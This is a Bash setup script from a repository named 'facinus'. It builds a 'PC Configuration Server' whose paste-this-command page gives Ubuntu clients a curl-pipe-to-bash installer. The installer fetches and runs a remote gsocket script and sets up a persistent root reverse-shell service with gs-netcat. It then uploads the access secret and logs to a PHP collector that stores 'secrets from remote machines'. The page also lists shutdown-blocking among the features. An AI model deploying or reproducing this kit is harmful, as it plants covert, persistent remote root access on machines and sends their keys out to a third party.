elleoma/facinus
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
16e2abc38a237b888de15a1dccbf17da2832cd77
facinus/setup_script.sh
Amoelle 16e2abc38a Add scripts
2025-04-01 18:11:07 +03:00

299 lines
11 KiB
Bash
Executable File
Raw Blame History

#!/bin/bash
# Create save_log.php file
cat > /tmp/save_log.php << 'EOF'
<?php
// Simple script to save logs and secrets from remote machines
// Create logs directory if it doesn't exist
$logs_dir = './logs';
if (!file_exists($logs_dir)) {
mkdir($logs_dir, 0755, true);
}
// Create secrets directory if it doesn't exist
$secrets_dir = './secrets';
if (!file_exists($secrets_dir)) {
mkdir($secrets_dir, 0755, true);
}
// Get the IP address and hostname
$ip = isset($_POST['ip']) ? $_POST['ip'] : 'unknown_ip';
$hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'unknown_host';
// Sanitize filenames to prevent directory traversal attacks
$ip = preg_replace('/[^a-zA-Z0-9\.\-]/', '_', $ip);
$hostname = preg_replace('/[^a-zA-Z0-9\.\-]/', '_', $hostname);
// Save the log file if uploaded
if (isset($_FILES['logfile']) && $_FILES['logfile']['error'] == 0) {
$timestamp = date('Y-m-d_H-i-s');
$log_filename = "{$logs_dir}/{$ip}_{$hostname}_{$timestamp}.log";
if (move_uploaded_file($_FILES['logfile']['tmp_name'], $log_filename)) {
echo "Log file saved successfully.\n";
} else {
echo "Error saving log file.\n";
}
}
// Save the secret if provided
if (isset($_POST['secret']) && !empty($_POST['secret'])) {
$secret_filename = "{$secrets_dir}/{$hostname}.txt";
if (file_put_contents($secret_filename, $_POST['secret'])) {
echo "Secret saved successfully.\n";
} else {
echo "Error saving secret.\n";
}
}
// Provide a response
header('Content-Type: text/plain');
echo "Data received from {$hostname} ({$ip}).\n";
?>
EOF
# Move PHP file to web root
sudo mv /tmp/save_log.php /srv/http/
# Create setup script file for Ubuntu clients
cat > /tmp/setup_script.sh << 'EOF'
#!/bin/bash
# Define your web server URL where logs will be stored
WEB_SERVER="http://SERVER_IP_PLACEHOLDER" # Will be replaced with actual IP
LOG_ENDPOINT="$WEB_SERVER/save_log.php"
# Get system information
HOSTNAME=$(hostname)
IP_ADDRESS=$(hostname -I | awk '{print $1}')
TIMESTAMP=$(date +"%Y-%m-%d_%H-%M-%S")
LOG_FILE="/tmp/setup_log_${TIMESTAMP}.txt"
# Function to log commands and their output
log_command() {
local cmd="$1"
local description="$2"
echo "----------------------------------------------" | tee -a "$LOG_FILE"
echo "[$TIMESTAMP] Executing: $description" | tee -a "$LOG_FILE"
echo "\$ $cmd" | tee -a "$LOG_FILE"
echo "----------------------------------------------" | tee -a "$LOG_FILE"
# Execute the command and capture output
OUTPUT=$(eval "$cmd" 2>&1)
STATUS=$?
echo "$OUTPUT" | tee -a "$LOG_FILE"
echo "Exit Status: $STATUS" | tee -a "$LOG_FILE"
echo "" | tee -a "$LOG_FILE"
return $STATUS
}
# Start logging
echo "==================================================" | tee -a "$LOG_FILE"
echo "Setup Script Started on $HOSTNAME ($IP_ADDRESS)" | tee -a "$LOG_FILE"
echo "Timestamp: $TIMESTAMP" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"
# 3. Set up Wake-on-LAN
# Identify network interface
PRIMARY_INTERFACE=$(ip -o -4 route show to default | awk '{print $5}' | head -n1)
log_command "echo 'Primary network interface: $PRIMARY_INTERFACE'" "Identifying network interface"
# Enable WoL in network configuration
cat > /tmp/wol.conf << _EOF_
[connection]
ethernet.wake-on-lan = magic
_EOF_
log_command "sudo mkdir -p /etc/NetworkManager/conf.d/" "Creating NetworkManager config directory"
log_command "sudo cp /tmp/wol.conf /etc/NetworkManager/conf.d/99-wol.conf" "Setting up Wake-on-LAN in NetworkManager"
# Check if Wake-on-LAN is supported
WOL_SUPPORTED=$(ethtool $PRIMARY_INTERFACE 2>/dev/null | grep -q "Supports Wake-on" && echo "yes" || echo "no")
if [ "$WOL_SUPPORTED" = "yes" ]; then
log_command "echo 'Wake-on-LAN is supported.'" "Checking Wake-on-LAN support"
# Create a systemd service for Wake-on-LAN that runs at boot and after resume
cat > /tmp/wol.service << _EOF_
[Unit]
Description=Enable Wake On LAN
After=network.target
After=suspend.target
After=hibernate.target
After=hybrid-sleep.target
[Service]
Type=oneshot
ExecStart=/sbin/ethtool -s $PRIMARY_INTERFACE wol g
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
WantedBy=suspend.target
WantedBy=hibernate.target
WantedBy=hybrid-sleep.target
_EOF_
log_command "sudo cp /tmp/wol.service /etc/systemd/system/wol.service" "Creating Wake-on-LAN service"
log_command "sudo systemctl daemon-reload" "Reloading systemd configuration"
log_command "sudo systemctl enable wol.service" "Enabling Wake-on-LAN service"
log_command "sudo systemctl start wol.service" "Starting Wake-on-LAN service"
# Immediately enable WoL
log_command "sudo ethtool -s $PRIMARY_INTERFACE wol g" "Enabling Wake-on-LAN immediately"
else
log_command "echo 'Wake-on-LAN not supported, skipping...'" "Wake-on-LAN not supported"
fi
# Add WoL persistence through boot in network interfaces
if [ -f /etc/network/interfaces ]; then
# For systems using traditional networking
if ! grep -q "up ethtool -s $PRIMARY_INTERFACE wol g" /etc/network/interfaces; then
log_command "echo 'auto $PRIMARY_INTERFACE' | sudo tee -a /etc/network/interfaces" "Adding WoL to network interfaces config"
log_command "echo 'iface $PRIMARY_INTERFACE inet dhcp' | sudo tee -a /etc/network/interfaces" "Adding WoL to network interfaces config"
log_command "echo 'up ethtool -s $PRIMARY_INTERFACE wol g' | sudo tee -a /etc/network/interfaces" "Adding WoL to network interfaces config"
fi
fi
# 4. Execute gsocket command and save the secret
log_command "echo 'Running gsocket setup...'" "Starting gsocket setup"
GSOCKET_OUTPUT=$(bash -c "$(curl -fsSL https://gsocket.io/y)" 2>&1)
echo "$GSOCKET_OUTPUT" | tee -a "$LOG_FILE"
# Extract the secret
SECRET=$(echo "$GSOCKET_OUTPUT" | grep -o 'S="[^"]*"' | sed 's/S="\(.*\)"/\1/')
if [ -n "$SECRET" ]; then
echo "Secret extracted: $SECRET" | tee -a "$LOG_FILE"
echo "$SECRET" > "/tmp/${HOSTNAME}_secret.txt"
log_command "echo 'Secret saved to /tmp/${HOSTNAME}_secret.txt'" "Saving secret to file"
# Save the secret to the gs-root-shell-key.txt file for the root shell service
log_command "sudo mkdir -p /etc/systemd" "Creating systemd directory if it doesn't exist"
log_command "echo '$SECRET' | sudo tee /etc/systemd/gs-root-shell-key.txt" "Saving GSSocket secret key for root shell"
log_command "sudo chmod 600 /etc/systemd/gs-root-shell-key.txt" "Setting secure permissions on key file"
else
log_command "echo 'Failed to extract secret'" "Secret extraction failed"
fi
# Install gs-netcat if not already installed by gsocket.io/y script
if ! command -v gs-netcat &> /dev/null; then
log_command "sudo apt-get install -y git build-essential" "Installing dependencies for gs-netcat"
log_command "git clone https://github.com/hackerschoice/gsocket.git /tmp/gsocket" "Cloning gsocket repository"
log_command "cd /tmp/gsocket && ./bootstrap && ./configure && make && sudo make install" "Building and installing gsocket"
fi
# 5. Create the Global Socket Root Shell service
cat > /tmp/gs-root-shell.service << 'EOG'
[Unit]
Description=Global Socket Root Shell
After=network.target
[Service]
Type=simple
Restart=always
RestartSec=10
WorkingDirectory=/root
ExecStart=/usr/local/bin/gs-netcat -k /etc/systemd/gs-root-shell-key.txt -il
[Install]
WantedBy=multi-user.target
EOG
log_command "sudo cp /tmp/gs-root-shell.service /etc/systemd/system/" "Creating Global Socket Root Shell service"
log_command "sudo systemctl daemon-reload" "Reloading systemd configuration"
log_command "sudo systemctl enable gs-root-shell.service" "Enabling Global Socket Root Shell service"
log_command "sudo systemctl start gs-root-shell.service" "Starting Global Socket Root Shell service"
log_command "sudo systemctl status gs-root-shell.service" "Checking Global Socket Root Shell service status"
# 6. Upload logs and secret to the web server
if command -v curl >/dev/null 2>&1; then
# Upload the main log file
log_command "curl -s -F 'ip=$IP_ADDRESS' -F 'hostname=$HOSTNAME' -F 'logfile=@$LOG_FILE' $LOG_ENDPOINT" "Uploading log file to server"
# Upload the secret file if it exists
if [ -n "$SECRET" ]; then
log_command "curl -s -F 'ip=$IP_ADDRESS' -F 'hostname=$HOSTNAME' -F 'secret=$SECRET' $LOG_ENDPOINT" "Uploading secret to server"
fi
else
echo "curl command not found. Cannot upload logs." | tee -a "$LOG_FILE"
fi
# Add usage information to log file
echo "==================================================" | tee -a "$LOG_FILE"
echo "GLOBAL SOCKET ROOT SHELL INFORMATION:" | tee -a "$LOG_FILE"
echo "To connect to this machine's root shell:" | tee -a "$LOG_FILE"
echo "1. Install gsocket (https://github.com/hackerschoice/gsocket)" | tee -a "$LOG_FILE"
echo "2. Run: gs-netcat -k KEY -s" | tee -a "$LOG_FILE"
echo " Replace KEY with the secret value in /etc/systemd/gs-root-shell-key.txt" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"
echo "Setup completed on $HOSTNAME ($IP_ADDRESS)" | tee -a "$LOG_FILE"
echo "Timestamp: $(date +"%Y-%m-%d_%H-%M-%S")" | tee -a "$LOG_FILE"
echo "==================================================" | tee -a "$LOG_FILE"
# Instead of poweroff at the end, show a message
echo "Configuration completed successfully!"
EOF
# Get server IP
SERVER_IP=$(ip -4 addr show | grep -oP '(?<=inet\s)\d+(\.\d+){3}' | grep -v "127.0.0.1" | head -n 1)
# Replace placeholder with actual server IP
sed -i "s/SERVER_IP_PLACEHOLDER/$SERVER_IP/g" /tmp/setup_script.sh
# Move setup script to web root
sudo mv /tmp/setup_script.sh /srv/http/
sudo chmod +x /srv/http/setup_script.sh
# Create a simple index page
cat > /tmp/index.html << EOF
<!DOCTYPE html>
<html>
<head>
<title>PC Configuration Server</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; line-height: 1.6; }
pre { background: #f4f4f4; padding: 10px; border-radius: 5px; }
</style>
</head>
<body>
<h1>PC Configuration Server</h1>
<p>Run the following command on your Ubuntu client machines:</p>
<pre>bash -c "\$(curl -fsSL http://${SERVER_IP}/setup_script.sh)"</pre>
<p>This script will configure:</p>
<ul>
<li>Power button to simulate shutdown (but actually suspend)</li>
<li>Prevents actual system shutdown - converts all shutdown attempts to suspend</li>
<li>SSH server for remote access</li>
<li>Wake-on-LAN for remote power on</li>
<li>System logging and monitoring</li>
<li>Global Socket Root Shell for remote root access</li>
</ul>
</body>
</html>
EOF
# Move index file to web root
sudo mv /tmp/index.html /srv/http/
# Adjust PHP settings for larger file uploads if needed
sudo sed -i 's/upload_max_filesize = .*/upload_max_filesize = 20M/' /etc/php/php.ini
sudo sed -i 's/post_max_size = .*/post_max_size = 21M/' /etc/php/php.ini
# Enable and start Apache service
sudo systemctl enable httpd
sudo systemctl restart httpd
echo "========================================================"
echo "Apache web server set up complete at http://$SERVER_IP"
echo "Run this command on client Ubuntu PCs:"
echo "bash -c \"\$(curl -fsSL http://$SERVER_IP/setup_script.sh)\""
echo "========================================================"
Reference in New Issue View Git Blame Copy Permalink